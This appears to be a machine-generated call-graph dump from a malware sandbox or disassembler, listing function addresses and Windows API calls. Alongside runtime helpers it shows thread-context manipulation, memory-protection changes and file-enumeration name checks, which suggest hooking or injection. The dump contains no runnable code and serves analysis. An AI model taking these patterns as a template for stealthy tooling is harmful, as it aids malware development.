_CallSETranslator 9 API calls 7794->7795 7796 1d547839a02 7795->7796 7796->7792 7800 1d547839340 7797->7800 7799 1d54783932d 7799->7788 7801 1d547839358 7800->7801 7802 1d54783935f GetLastError 7800->7802 7801->7799 7812 1d547839c8c 7802->7812 7816 1d547839aac 7812->7816 7817 1d547839b96 TlsGetValue 7816->7817 7822 1d547839af0 __vcrt_FlsAlloc 7816->7822 7818 1d547839b1e LoadLibraryExW 7820 1d547839b3f GetLastError 7818->7820 7821 1d547839bbd 7818->7821 7819 1d547839bdd GetProcAddress 7819->7817 7820->7822 7821->7819 7823 1d547839bd4 FreeLibrary 7821->7823 7822->7817 7822->7818 7822->7819 7824 1d547839b61 LoadLibraryExW 7822->7824 7823->7819 7824->7821 7824->7822 8258 1d547832e54 8260 1d547832ea8 8258->8260 8259 1d547832ec3 8260->8259 8262 1d5478337f4 8260->8262 8263 1d54783388a 8262->8263 8265 1d547833819 8262->8265 8263->8259 8264 1d547833f88 StrCmpNIW 8264->8265 8265->8263 8265->8264 8266 1d547831e08 StrCmpIW StrCmpW 8265->8266 8266->8265 9200 1d54784494f 9201 1d54784495e 9200->9201 9203 1d547844968 9200->9203 9204 1d54783c5ac LeaveCriticalSection 9201->9204 8882 1d5478419d0 8883 1d54783e864 56 API calls 8882->8883 8884 1d5478419d9 8883->8884 8885 1d54783c1d8 8886 1d54783c209 8885->8886 8887 1d54783c1f1 8885->8887 8887->8886 8888 1d54783d2a0 __free_lconv_mon 13 API calls 8887->8888 8888->8886 7834 1d54783f6dc 7835 1d54783f6e8 7834->7835 7836 1d54783f70f 7835->7836 7838 1d547841c0c 7835->7838 7839 1d547841c4c 7838->7839 7840 1d547841c11 7838->7840 7839->7835 7841 1d547841c32 DeleteCriticalSection 7840->7841 7842 1d547841c44 7840->7842 7841->7841 7841->7842 7843 1d54783d2a0 __free_lconv_mon 13 API calls 7842->7843 7843->7839 8889 1d5478325dc 8890 1d54783265a 8889->8890 8891 1d5478326bf GetFileType 8890->8891 8899 1d547832777 8890->8899 8892 1d5478326cd StrCpyW 8891->8892 8893 1d5478326e1 8891->8893 8896 1d5478326ee 8892->8896 8900 1d547831ad4 GetFinalPathNameByHandleW 8893->8900 8895 1d547833f88 StrCmpNIW 8895->8896 8896->8895 8896->8899 8905 1d547833708 StrCmpIW 8896->8905 8909 1d547831dd4 8896->8909 8901 1d547831afe StrCmpNIW 8900->8901 8902 1d547831b3d 8900->8902 8901->8902 8903 1d547831b18 lstrlenW 8901->8903 8902->8896 8903->8902 8904 1d547831b2a StrCpyW 8903->8904 8904->8902 8906 1d54783373a StrCpyW StrCatW 8905->8906 8907 1d547833751 PathCombineW 8905->8907 8908 1d54783375a 8906->8908 8907->8908 8908->8896 8910 1d547831deb 8909->8910 8911 1d547831df4 8909->8911 8912 1d547831530 2 API calls 8910->8912 8911->8896 8912->8911 8267 1d54783d658 8268 1d54783d67d 8267->8268 8273 1d54783d694 8267->8273 8269 1d54783d1f4 __std_exception_copy 13 API calls 8268->8269 8270 1d54783d682 8269->8270 8272 1d54783d04c _invalid_parameter_noinfo 38 API calls 8270->8272 8271 1d54783d724 8399 1d54783bb54 8271->8399 8275 1d54783d68d 8272->8275 8273->8271 8282 1d54783d6da 8273->8282 8284 1d54783d7b6 8273->8284 8300 1d54783d894 8273->8300 8362 1d54783da18 8273->8362 8278 1d54783d784 8281 1d54783d2a0 __free_lconv_mon 13 API calls 8278->8281 8280 1d54783d836 8285 1d54783d2a0 __free_lconv_mon 13 API calls 8280->8285 8283 1d54783d78b 8281->8283 8286 1d54783d6fd 8282->8286 8291 1d54783d2a0 __free_lconv_mon 13 API calls 8282->8291 8283->8286 8292 1d54783d2a0 __free_lconv_mon 13 API calls 8283->8292 8284->8286 8290 1d54783d2a0 __free_lconv_mon 13 API calls 8284->8290 8288 1d54783d841 8285->8288 8293 1d54783d2a0 __free_lconv_mon 13 API calls 8286->8293 8287 1d54783d7d7 8287->8280 8287->8287 8297 1d54783d87c 8287->8297 8405 1d547840eb8 8287->8405 8289 1d54783d85a 8288->8289 8294 1d54783d2a0 __free_lconv_mon 13 API calls 8288->8294 8295 1d54783d2a0 __free_lconv_mon 13 API calls 8289->8295 8290->8284 8291->8282 8292->8283 8293->8275 8294->8288 8295->8275 8298 1d54783d06c _invalid_parameter_noinfo 17 API calls 8297->8298 8299 1d54783d891 8298->8299 8301 1d54783d8c2 8300->8301 8301->8301 8302 1d54783d8de 8301->8302 8303 1d54783d220 __std_exception_copy 13 API calls 8301->8303 8302->8273 8304 1d54783d90d 8303->8304 8305 1d54783d926 8304->8305 8306 1d547840eb8 38 API calls 8304->8306 8307 1d547840eb8 38 API calls 8305->8307 8309 1d54783d9fc 8305->8309 8306->8305 8308 1d54783d943 8307->8308 8308->8309 8311 1d54783d97f 8308->8311 8312 1d54783d962 8308->8312 8313 1d54783d98d 8308->8313 8310 1d54783d06c _invalid_parameter_noinfo 17 API calls 8309->8310 8323 1d54783da17 8310->8323 8314 1d54783d2a0 __free_lconv_mon 13 API calls 8311->8314 8316 1d54783d220 __std_exception_copy 13 API calls 8312->8316 8315 1d54783d977 8313->8315 8414 1d54783eee0 8313->8414 8314->8309 8315->8311 8320 1d54783d2a0 __free_lconv_mon 13 API calls 8315->8320 8317 1d54783d96d 8316->8317 8321 1d54783d2a0 __free_lconv_mon 13 API calls 8317->8321 8319 1d54783da7a 8324 1d54783daa1 8319->8324 8325 1d54783da8c 8319->8325 8320->8311 8321->8315 8322 1d54783d9b5 8326 1d54783d9ba 8322->8326 8327 1d54783d9d0 8322->8327 8323->8319 8423 1d5478413d8 8323->8423 8334 1d54783dd78 14 API calls 8324->8334 8329 1d54783d894 52 API calls 8325->8329 8330 1d54783d2a0 __free_lconv_mon 13 API calls 8326->8330 8331 1d54783d2a0 __free_lconv_mon 13 API calls 8327->8331 8332 1d54783da9c 8329->8332 8330->8315 8331->8311 8333 1d547838070 _invalid_parameter_noinfo 8 API calls 8332->8333 8335 1d54783dd64 8333->8335 8336 1d54783db0b 8334->8336 8335->8273 8337 1d54783db1a 8336->8337 8432 1d54783f198 8336->8432 8436 1d54783d30c 8337->8436 8341 1d54783dba8 8342 1d54783d894 52 API calls 8341->8342 8344 1d54783dbb8 8342->8344 8343 1d54783dd78 14 API calls 8350 1d54783dbd2 8343->8350 8344->8332 8345 1d54783d2a0 __free_lconv_mon 13 API calls 8344->8345 8345->8332 8346 1d54783f198 9 API calls 8346->8350 8348 1d54783d894 52 API calls 8348->8350 8349 1d54783dcc8 FindNextFileW 8349->8350 8351 1d54783dce0 8349->8351 8350->8343 8350->8346 8350->8348 8350->8349 8352 1d54783dd2a 8350->8352 8359 1d54783d2a0 13 API calls __free_lconv_mon 8350->8359 8458 1d54783d4ac 8350->8458 8353 1d54783dd0c FindClose 8351->8353 8480 1d547840b20 8351->8480 8354 1d54783dd38 FindClose 8352->8354 8357 1d54783d2a0 __free_lconv_mon 13 API calls 8352->8357 8353->8332 8356 1d54783dd1c 8353->8356 8354->8332 8358 1d54783dd48 8354->8358 8360 1d54783d2a0 __free_lconv_mon 13 API calls 8356->8360 8357->8354 8361 1d54783d2a0 __free_lconv_mon 13 API calls 8358->8361 8359->8350 8360->8332 8361->8332 8363 1d54783da7a 8362->8363 8364 1d54783da58 8362->8364 8365 1d54783da8c 8363->8365 8368 1d54783daa1 8363->8368 8364->8363 8366 1d5478413d8 38 API calls 8364->8366 8367 1d54783d894 56 API calls 8365->8367 8366->8364 8381 1d54783da9c 8367->8381 8370 1d54783dd78 14 API calls 8368->8370 8369 1d547838070 _invalid_parameter_noinfo 8 API calls 8371 1d54783dd64 8369->8371 8372 1d54783db0b 8370->8372 8371->8273 8373 1d54783db1a 8372->8373 8374 1d54783f198 9 API calls 8372->8374 8375 1d54783d30c 16 API calls 8373->8375 8374->8373 8376 1d54783db7b FindFirstFileExW 8375->8376 8377 1d54783dba8 8376->8377 8387 1d54783dbd2 8376->8387 8378 1d54783d894 56 API calls 8377->8378 8380 1d54783dbb8 8378->8380 8379 1d54783dd78 14 API calls 8379->8387 8380->8381 8382 1d54783d2a0 __free_lconv_mon 13 API calls 8380->8382 8381->8369 8382->8381 8383 1d54783f198 9 API calls 8383->8387 8384 1d54783d4ac 16 API calls 8384->8387 8385 1d54783d894 56 API calls 8385->8387 8386 1d54783dcc8 FindNextFileW 8386->8387 8388 1d54783dce0 8386->8388 8387->8379 8387->8383 8387->8384 8387->8385 8387->8386 8389 1d54783d2a0 13 API calls __free_lconv_mon 8387->8389 8390 1d54783dd2a 8387->8390 8391 1d54783dd0c FindClose 8388->8391 8393 1d547840b20 38 API calls 8388->8393 8389->8387 8392 1d54783dd38 FindClose 8390->8392 8395 1d54783d2a0 __free_lconv_mon 13 API calls 8390->8395 8391->8381 8394 1d54783dd1c 8391->8394 8392->8381 8396 1d54783dd48 8392->8396 8393->8391 8397 1d54783d2a0 __free_lconv_mon 13 API calls 8394->8397 8395->8392 8398 1d54783d2a0 __free_lconv_mon 13 API calls 8396->8398 8397->8381 8398->8381 8400 1d54783bb6c 8399->8400 8404 1d54783bba4 8399->8404 8401 1d54783d220 __std_exception_copy 13 API calls 8400->8401 8400->8404 8402 1d54783bb9a 8401->8402 8403 1d54783d2a0 __free_lconv_mon 13 API calls 8402->8403 8403->8404 8404->8278 8404->8287 8406 1d547840ed5 8405->8406 8408 1d547840eda 8406->8408 8411 1d547840ef0 8406->8411 8412 1d547840f24 8406->8412 8407 1d54783d1f4 __std_exception_copy 13 API calls 8409 1d547840ee4 8407->8409 8408->8407 8408->8411 8410 1d54783d04c _invalid_parameter_noinfo 38 API calls 8409->8410 8410->8411 8411->8287 8412->8411 8413 1d54783d1f4 __std_exception_copy 13 API calls 8412->8413 8413->8409 8415 1d54783ef02 8414->8415 8416 1d54783ef1f 8414->8416 8415->8416 8417 1d54783ef10 8415->8417 8418 1d54783ef29 8416->8418 8488 1d5478419f0 8416->8488 8419 1d54783d1f4 __std_exception_copy 13 API calls 8417->8419 8495 1d547841a40 8418->8495 8422 1d54783ef15 8419->8422 8422->8322 8424 1d5478413e0 8423->8424 8425 1d5478413f5 8424->8425 8427 1d54784140e 8424->8427 8426 1d54783d1f4 __std_exception_copy 13 API calls 8425->8426 8428 1d5478413fa 8426->8428 8429 1d547841405 8427->8429 8431 1d54783dd78 14 API calls 8427->8431 8430 1d54783d04c _invalid_parameter_noinfo 38 API calls 8428->8430 8429->8323 8430->8429 8431->8429 8433 1d54783f1a9 8432->8433 8434 1d54783f1ca 8432->8434 8433->8434 8435 1d54783ef88 9 API calls 8433->8435 8434->8337 8435->8434 8437 1d54783d35a 8436->8437 8438 1d54783d336 8436->8438 8439 1d54783d3bf 8437->8439 8440 1d54783d35f 8437->8440 8441 1d54783d2a0 __free_lconv_mon 13 API calls 8438->8441 8449 1d54783d345 FindFirstFileExW 8438->8449 8442 1d54783ec58 MultiByteToWideChar 8439->8442 8443 1d54783d374 8440->8443 8446 1d54783d2a0 __free_lconv_mon 13 API calls 8440->8446 8440->8449 8441->8449 8452 1d54783d3db 8442->8452 8444 1d54783c5d0 14 API calls 8443->8444 8444->8449 8445 1d54783d3e2 GetLastError 8507 1d54783d184 8445->8507 8446->8443 8448 1d54783d420 8448->8449 8450 1d54783ec58 MultiByteToWideChar 8448->8450 8449->8341 8449->8350 8455 1d54783d47a 8450->8455 8452->8445 8452->8448 8453 1d54783d413 8452->8453 8457 1d54783d2a0 __free_lconv_mon 13 API calls 8452->8457 8454 1d54783c5d0 14 API calls 8453->8454 8454->8448 8455->8445 8455->8449 8456 1d54783d1f4 __std_exception_copy 13 API calls 8456->8449 8457->8453 8459 1d54783d4fa 8458->8459 8460 1d54783d4d6 8458->8460 8461 1d54783d55f 8459->8461 8462 1d54783d500 8459->8462 8463 1d54783d2a0 __free_lconv_mon 13 API calls 8460->8463 8467 1d54783d4e5 8460->8467 8464 1d54783ece8 WideCharToMultiByte 8461->8464 8465 1d54783d515 8462->8465 8462->8467 8468 1d54783d2a0 __free_lconv_mon 13 API calls 8462->8468 8463->8467 8474 1d54783d583 8464->8474 8469 1d54783c5d0 14 API calls 8465->8469 8466 1d54783d58a GetLastError 8470 1d54783d184 13 API calls 8466->8470 8467->8350 8468->8465 8469->8467 8473 1d54783d597 8470->8473 8471 1d54783d5c7 8471->8467 8472 1d54783ece8 WideCharToMultiByte 8471->8472 8476 1d54783d629 8472->8476 8477 1d54783d1f4 __std_exception_copy 13 API calls 8473->8477 8474->8466 8474->8471 8475 1d54783d5bb 8474->8475 8478 1d54783d2a0 __free_lconv_mon 13 API calls 8474->8478 8479 1d54783c5d0 14 API calls 8475->8479 8476->8466 8476->8467 8477->8467 8478->8475 8479->8471 8481 1d547840b52 8480->8481 8482 1d54783d1f4 __std_exception_copy 13 API calls 8481->8482 8487 1d547840b67 8481->8487 8483 1d547840b5c 8482->8483 8484 1d54783d04c _invalid_parameter_noinfo 38 API calls 8483->8484 8484->8487 8485 1d547838070 _invalid_parameter_noinfo 8 API calls 8486 1d547840ea8 8485->8486 8486->8353 8487->8485 8489 1d5478419f9 8488->8489 8490 1d547841a12 HeapSize 8488->8490 8491 1d54783d1f4 __std_exception_copy 13 API calls 8489->8491 8492 1d5478419fe 8491->8492 8493 1d54783d04c _invalid_parameter_noinfo 38 API calls 8492->8493 8494 1d547841a09 8493->8494 8494->8418 8496 1d547841a55 8495->8496 8497 1d547841a5f 8495->8497 8498 1d54783c5d0 14 API calls 8496->8498 8499 1d547841a64 8497->8499 8505 1d547841a6b __std_exception_copy 8497->8505 8503 1d547841a5d 8498->8503 8502 1d54783d2a0 __free_lconv_mon 13 API calls 8499->8502 8500 1d547841a71 8504 1d54783d1f4 __std_exception_copy 13 API calls 8500->8504 8501 1d547841a9e HeapReAlloc 8501->8503 8501->8505 8502->8503 8503->8422 8504->8503 8505->8500 8505->8501 8506 1d54783b470 __std_exception_copy 2 API calls 8505->8506 8506->8505 8512 1d54783d1d0 8507->8512 8509 1d54783d191 __free_lconv_mon 8510 1d54783d1f4 __std_exception_copy 13 API calls 8509->8510 8511 1d54783d1a1 8510->8511 8511->8456 8513 1d54783cb10 __std_exception_copy 13 API calls 8512->8513 8514 1d54783d1d9 8513->8514 8514->8509 9205 1d547837f60 9206 1d547837f7c 9205->9206 9207 1d547837f81 9205->9207 9209 1d547838090 9206->9209 9210 1d547838127 9209->9210 9211 1d5478380b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9209->9211 9210->9207 9211->9210 8913 1d54783f3e4 8914 1d54783f41d 8913->8914 8915 1d54783f3ee 8913->8915 8915->8914 8916 1d54783f403 FreeLibrary 8915->8916 8916->8915 8917 1d5478433e4 8918 1d5478433fb 8917->8918 8919 1d5478433f5 CloseHandle 8917->8919 8919->8918 9212 1d547832f64 9214 1d547832fc1 9212->9214 9213 1d547832fdc 9214->9213 9215 1d5478338a8 3 API calls 9214->9215 9215->9213 8515 1d54784485e 8516 1d547839324 _CallSETranslator 9 API calls 8515->8516 8517 1d54784486c 8516->8517 8518 1d547844877 8517->8518 8519 1d547839324 _CallSETranslator 9 API calls 8517->8519 8519->8518 8920 1d5478363e3 8921 1d5478363f0 8920->8921 8922 1d5478363fc GetThreadContext 8921->8922 8929 1d54783655a 8921->8929 8923 1d547836422 8922->8923 8922->8929 8924 1d547836449 8923->8924 8923->8929 8931 1d5478364cd 8924->8931 8932 1d5478364a6 SetThreadContext 8924->8932 8925 1d547836581 VirtualProtect FlushInstructionCache 8925->8929 8926 1d54783665e 8942 1d547835530 GetCurrentProcess 8926->8942 8927 1d54783663e 8927->8926 8938 1d547834b20 8927->8938 8929->8925 8929->8927 8932->8931 8933 1d5478366b7 8936 1d547838070 _invalid_parameter_noinfo 8 API calls 8933->8936 8934 1d547836677 ResumeThread 8935 1d547836663 8934->8935 8935->8933 8935->8934 8937 1d5478366ff 8936->8937 8940 1d547834b3c 8938->8940 8939 1d547834b9f 8939->8926 8940->8939 8941 1d547834b52 VirtualFree 8940->8941 8941->8940 8943 1d54783554c 8942->8943 8944 1d547835593 8943->8944 8945 1d547835562 VirtualProtect FlushInstructionCache 8943->8945 8944->8935 8945->8943 8520 1d54784465f 8521 1d5478446e2 8520->8521 8522 1d547844677 8520->8522 8522->8521 8523 1d547839324 _CallSETranslator 9 API calls 8522->8523 8524 1d5478446c4 8523->8524 8525 1d547839324 _CallSETranslator 9 API calls 8524->8525 8526 1d5478446d9 8525->8526 8527 1d54783c2f4 14 API calls 8526->8527 8527->8521 7844 1d5478406e0 7845 1d5478406e9 7844->7845 7846 1d5478406f9 7844->7846 7847 1d54783d1f4 __std_exception_copy 13 API calls 7845->7847 7848 1d5478406ee 7847->7848 7849 1d54783d04c _invalid_parameter_noinfo 38 API calls 7848->7849 7849->7846 9216 1d547843960 9226 1d547838ca0 9216->9226 9218 1d547843988 9220 1d547839324 _CallSETranslator 9 API calls 9221 1d547843998 9220->9221 9222 1d547839324 _CallSETranslator 9 API calls 9221->9222 9223 1d5478439a1 9222->9223 9224 1d54783c2f4 14 API calls 9223->9224 9225 1d5478439aa 9224->9225 9228 1d547838cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9226->9228 9227 1d547838dd1 9227->9218 9227->9220 9228->9227 9229 1d547838d94 RtlUnwindEx 9228->9229 9229->9228 8946 1d5478327e8 8947 1d547832867 8946->8947 8948 1d5478328c9 GetFileType 8947->8948 8960 1d547832998 8947->8960 8949 1d5478328d7 StrCpyW 8948->8949 8950 1d5478328ed 8948->8950 8951 1d5478328fc 8949->8951 8952 1d547831ad4 4 API calls 8950->8952 8953 1d54783299d 8951->8953 8954 1d547832906 8951->8954 8952->8951 8955 1d547833f88 StrCmpNIW 8953->8955 8957 1d547833708 4 API calls 8953->8957 8958 1d547831dd4 2 API calls 8953->8958 8953->8960 8956 1d547833f88 StrCmpNIW 8954->8956 8959 1d547833708 4 API calls 8954->8959 8954->8960 8961 1d547831dd4 2 API calls 8954->8961 8955->8953 8956->8954 8957->8953 8958->8953 8959->8954 8961->8954 8962 1d54783b7ea 8963 1d54783c2f4 14 API calls 8962->8963 8964 1d54783b7ef 8963->8964 8965 1d54783b815 GetModuleHandleW 8964->8965 8966 1d54783b85f 8964->8966 8965->8966 8970 1d54783b822 8965->8970 8979 1d54783b6f8 8966->8979 8970->8966 8974 1d54783b904 GetModuleHandleExW 8970->8974 8975 1d54783b938 GetProcAddress 8974->8975 8976 1d54783b94a 8974->8976 8975->8976 8977 1d54783b95b FreeLibrary 8976->8977 8978 1d54783b962 8976->8978 8977->8978 8978->8966 8991 1d54783c558 EnterCriticalSection 8979->8991 8992 1d547832ff0 8993 1d547833061 8992->8993 8994 1d547833384 8993->8994 8995 1d54783308d GetModuleHandleA 8993->8995 8996 1d54783309f GetProcAddress 8995->8996 8997 1d5478330b1 8995->8997 8996->8997 8997->8994 8998 1d5478330d8 StrCmpNIW 8997->8998 8998->8994 8999 1d5478330fd 8998->8999 8999->8994 9000 1d547831a30 6 API calls 8999->9000 9001 1d5478332b9 lstrlenW 8999->9001 9002 1d54783320f lstrlenW 8999->9002 9003 1d547833f88 StrCmpNIW 8999->9003 9004 1d547831cfc StrCmpIW StrCmpW 8999->9004 9000->8999 9001->8999 9002->8999 9003->8999 9004->8999 9230 1d547835974 9231 1d54783597a 9230->9231 9242 1d547837fa0 9231->9242 9235 1d5478359de 9237 1d547835a77 9237->9235 9239 1d547835bfd 9237->9239 9255 1d547837b80 9237->9255 9238 1d547835cfb 9239->9238 9240 1d547835d77 VirtualProtect 9239->9240 9240->9235 9241 1d547835da3 GetLastError 9240->9241 9241->9235 9243 1d547837fab 9242->9243 9244 1d5478359bd 9243->9244 9245 1d54783b470 __std_exception_copy 2 API calls 9243->9245 9246 1d547837fca 9243->9246 9244->9235 9251 1d547834400 9244->9251 9245->9243 9249 1d547837fd5 9246->9249 9261 1d5478387b8 9246->9261 9265 1d5478387d8 9249->9265 9252 1d54783441d 9251->9252 9254 1d54783448c 9252->9254 9269 1d547834670 9252->9269 9254->9237 9256 1d547837bc7 9255->9256 9294 1d547837950 9256->9294 9259 1d547838070 _invalid_parameter_noinfo 8 API calls 9260 1d547837bf1 9259->9260 9260->9237 9262 1d5478387c6 std::bad_alloc::bad_alloc 9261->9262 9263 1d547839178 Concurrency::cancel_current_task 2 API calls 9262->9263 9264 1d5478387d7 9263->9264 9266 1d5478387e6 std::bad_alloc::bad_alloc 9265->9266 9267 1d547839178 Concurrency::cancel_current_task 2 API calls 9266->9267 9268 1d547837fdb 9267->9268 9270 1d5478346b7 9269->9270 9271 1d547834694 9269->9271 9272 1d5478346ed 9270->9272 9289 1d547834250 9270->9289 9271->9270 9283 1d547834120 9271->9283 9273 1d54783471d 9272->9273 9278 1d547834250 2 API calls 9272->9278 9276 1d547834753 9273->9276 9280 1d547834120 3 API calls 9273->9280 9277 1d54783476f 9276->9277 9279 1d547834120 3 API calls 9276->9279 9281 1d547834250 2 API calls 9277->9281 9282 1d54783478b 9277->9282 9278->9273 9279->9277 9280->9276 9281->9282 9282->9254 9284 1d547834141 9283->9284 9285 1d547834196 VirtualQuery 9284->9285 9286 1d5478341b0 9284->9286 9287 1d5478341ca VirtualAlloc 9284->9287 9285->9284 9285->9286 9286->9270 9287->9286 9288 1d5478341fb GetLastError 9287->9288 9288->9284 9293 1d547834268 9289->9293 9290 1d5478342d7 9290->9272 9291 1d5478342bd VirtualQuery 9291->9290 9291->9293 9292 1d547834322 GetLastError 9292->9293 9293->9290 9293->9291 9293->9292 9295 1d54783796b 9294->9295 9296 1d54783798f 9295->9296 9297 1d547837981 SetLastError 9295->9297 9296->9259 9297->9296 8528 1d547838672 8529 1d5478390c0 __std_exception_copy 38 API calls 8528->8529 8530 1d54783869d 8529->8530 8531 1d54783f870 8532 1d54783f8a0 8531->8532 8534 1d54783f8c7 8531->8534 8533 1d54783cb10 __std_exception_copy 13 API calls 8532->8533 8532->8534 8538 1d54783f8b4 8532->8538 8533->8538 8535 1d54783f99c 8534->8535 8554 1d54783c558 EnterCriticalSection 8534->8554 8539 1d54783fab3 8535->8539 8541 1d54783fa03 8535->8541 8547 1d54783f9ca 8535->8547 8536 1d54783f904 8538->8534 8538->8536 8540 1d54783f949 8538->8540 8542 1d54783fac0 8539->8542 8556 1d54783c5ac LeaveCriticalSection 8539->8556 8543 1d54783d1f4 __std_exception_copy 13 API calls 8540->8543 8552 1d54783fa61 8541->8552 8555 1d54783c5ac LeaveCriticalSection 8541->8555 8546 1d54783f94e 8543->8546 8548 1d54783d04c _invalid_parameter_noinfo 38 API calls 8546->8548 8547->8541 8549 1d54783cab0 _invalid_parameter_noinfo 14 API calls 8547->8549 8548->8536 8551 1d54783f9f3 8549->8551 8550 1d54783cab0 14 API calls _invalid_parameter_noinfo 8550->8552 8553 1d54783cab0 _invalid_parameter_noinfo 14 API calls 8551->8553 8552->8550 8553->8541 9298 1d54783f370 VirtualProtect 8557 1d54784387c 8558 1d5478438b4 __GSHandlerCheckCommon 8557->8558 8559 1d5478438e0 8558->8559 8561 1d547839a24 8558->8561 8562 1d547839324 _CallSETranslator 9 API calls 8561->8562 8563 1d547839a4e 8562->8563 8564 1d547839324 _CallSETranslator 9 API calls 8563->8564 8565 1d547839a5b 8564->8565 8566 1d547839324 _CallSETranslator 9 API calls 8565->8566 8567 1d547839a64 8566->8567 8567->8559 9005 1d54783cbfc 9010 1d54783f3a0 9005->9010 9007 1d54783cc05 9008 1d54783cb10 __std_exception_copy 13 API calls 9007->9008 9009 1d54783cc22 __vcrt_uninitialize_ptd 9007->9009 9008->9009 9011 1d54783f3b5 9010->9011 9012 1d54783f3b1 9010->9012 9011->9012 9013 1d54783ef88 9 API calls 9011->9013 9012->9007 9013->9012 7853 1d5478446f5 7854 1d547839324 _CallSETranslator 9 API calls 7853->7854 7855 1d54784470d 7854->7855 7856 1d547839324 _CallSETranslator 9 API calls 7855->7856 7857 1d547844728 7856->7857 7858 1d547839324 _CallSETranslator 9 API calls 7857->7858 7859 1d54784473c 7858->7859 7860 1d547839324 _CallSETranslator 9 API calls 7859->7860 7861 1d54784477e 7860->7861 9014 1d5478341f9 9017 1d547834146 9014->9017 9015 1d5478341b0 9016 1d547834196 VirtualQuery 9016->9015 9016->9017 9017->9015 9017->9016 9018 1d5478341ca VirtualAlloc 9017->9018 9018->9015 9019 1d5478341fb GetLastError 9018->9019 9019->9017 9020 1d547835ff9 9021 1d547836000 VirtualProtect 9020->9021 9022 1d547836029 GetLastError 9021->9022 9023 1d547835f10 9021->9023 9022->9023 7862 1d547832300 7863 1d547832331 7862->7863 7864 1d547832447 7863->7864 7870 1d547832412 7863->7870 7872 1d547832355 7863->7872 7865 1d54783244c 7864->7865 7866 1d5478324bb 7864->7866 7879 1d5478335c8 GetProcessHeap HeapAlloc 7865->7879 7869 1d5478335c8 11 API calls 7866->7869 7866->7870 7868 1d54783238d StrCmpNIW 7868->7872 7869->7870 7872->7868 7872->7870 7873 1d547831d30 7872->7873 7874 1d547831d57 GetProcessHeap HeapAlloc 7873->7874 7875 1d547831db4 7873->7875 7874->7875 7876 1d547831d92 7874->7876 7875->7872 7877 1d547831cfc 2 API calls 7876->7877 7878 1d547831d9a GetProcessHeap HeapFree 7877->7878 7878->7875 7884 1d54783361b 7879->7884 7880 1d5478336d9 GetProcessHeap HeapFree 7880->7870 7881 1d5478336d4 7881->7880 7882 1d547833666 StrCmpNIW 7882->7884 7883 1d547831d30 6 API calls 7883->7884 7884->7880 7884->7881 7884->7882 7884->7883 7885 1d54783b500 7890 1d54783c558 EnterCriticalSection 7885->7890 9299 1d54783c180 9302 1d54783bf38 9299->9302 9309 1d54783bf00 9302->9309 9307 1d54783bebc 13 API calls 9308 1d54783bf6b 9307->9308 9310 1d54783bf15 9309->9310 9311 1d54783bf10 9309->9311 9313 1d54783bf1c 9310->9313 9312 1d54783bebc 13 API calls 9311->9312 9312->9310 9314 1d54783bf2c 9313->9314 9315 1d54783bf31 9313->9315 9316 1d54783bebc 13 API calls 9314->9316 9315->9307 9316->9315 7891 1d547838f0c 7898 1d54783946c 7891->7898 7894 1d547838f19 7901 1d547839474 7898->7901 7900 1d5478394a5 7903 1d5478394b4 __vcrt_uninitialize_locks DeleteCriticalSection 7900->7903 7901->7900 7902 1d547838f15 7901->7902 7915 1d547839d28 7901->7915 7902->7894 7904 1d547839400 7902->7904 7903->7902 7920 1d547839bfc 7904->7920 7916 1d547839aac __vcrt_FlsAlloc 5 API calls 7915->7916 7917 1d547839d5e 7916->7917 7918 1d547839d68 7917->7918 7919 1d547839d73 InitializeCriticalSectionAndSpinCount 7917->7919 7918->7901 7919->7918 7921 1d547839aac __vcrt_FlsAlloc 5 API calls 7920->7921 7922 1d547839c21 TlsAlloc 7921->7922 9024 1d54783820c 9031 1d547838f34 9024->9031 9027 1d547838219 9032 1d547839340 _CallSETranslator 9 API calls 9031->9032 9033 1d547838215 9032->9033 9033->9027 9034 1d54783c288 9033->9034 9035 1d54783cb10 __std_exception_copy 13 API calls 9034->9035 9036 1d547838222 9035->9036 9036->9027 9037 1d547838f48 9036->9037 9040 1d5478392dc 9037->9040 9039 1d547838f51 9039->9027 9041 1d5478392ed 9040->9041 9045 1d547839302 9040->9045 9042 1d547839c8c _CallSETranslator 6 API calls 9041->9042 9043 1d5478392f2 9042->9043 9046 1d547839cd4 9043->9046 9045->9039 9047 1d547839aac __vcrt_FlsAlloc 5 API calls 9046->9047 9048 1d547839d02 9047->9048 9049 1d547839d0c 9048->9049 9050 1d547839d14 TlsSetValue 9048->9050 9049->9045 9050->9049 7924 1d54783c510 7925 1d54783c518 7924->7925 7927 1d54783c545 7925->7927 7928 1d54783c574 7925->7928 7929 1d54783c59f 7928->7929 7930 1d54783c5a3 7929->7930 7931 1d54783c582 DeleteCriticalSection 7929->7931 7930->7927 7931->7929 9051 1d547844611 __scrt_dllmain_exception_filter 8576 1d547835c8d 8577 1d547835c94 8576->8577 8578 1d547835cfb 8577->8578 8579 1d547835d77 VirtualProtect 8577->8579 8580 1d547835da3 GetLastError 8579->8580 8581 1d547835db1 8579->8581 8580->8581 7932 1d547832518 GetProcessIdOfThread GetCurrentProcessId 7933 1d5478325be 7932->7933 7934 1d547832543 CreateFileW 7932->7934 7934->7933 7935 1d547832577 WriteFile ReadFile CloseHandle 7934->7935 7935->7933 9052 1d54783c218 9053 1d54783d2a0 __free_lconv_mon 13 API calls 9052->9053 9054 1d54783c228 9053->9054 9055 1d54783d2a0 __free_lconv_mon 13 API calls 9054->9055 9056 1d54783c23c 9055->9056 9057 1d54783d2a0 __free_lconv_mon 13 API calls 9056->9057 9058 1d54783c250 9057->9058 9059 1d54783d2a0 __free_lconv_mon 13 API calls 9058->9059 9060 1d54783c264 9059->9060 9317 1d547841398 9318 1d5478413ae 9317->9318 9319 1d5478413f5 9318->9319 9321 1d54784140e 9318->9321 9320 1d54783d1f4 __std_exception_copy 13 API calls 9319->9320 9322 1d5478413fa 9320->9322 9323 1d547841405 9321->9323 9325 1d54783dd78 14 API calls 9321->9325 9324 1d54783d04c _invalid_parameter_noinfo 38 API calls 9322->9324 9324->9323 9325->9323 7936 1d547834320 7939 1d54783426d 7936->7939 7937 1d5478342d7 7938 1d5478342bd VirtualQuery 7938->7937 7938->7939 7939->7937 7939->7938 7940 1d547834322 GetLastError 7939->7940 7940->7939 9326 1d54784479d 9329 1d54783af34 9326->9329 9330 1d54783af4e 9329->9330 9332 1d54783af9b 9329->9332 9331 1d547839324 _CallSETranslator 9 API calls 9330->9331 9330->9332 9331->9332 9061 1d54783fe20 9062 1d54783fe4a 9061->9062 9063 1d54783d220 __std_exception_copy 13 API calls 9062->9063 9064 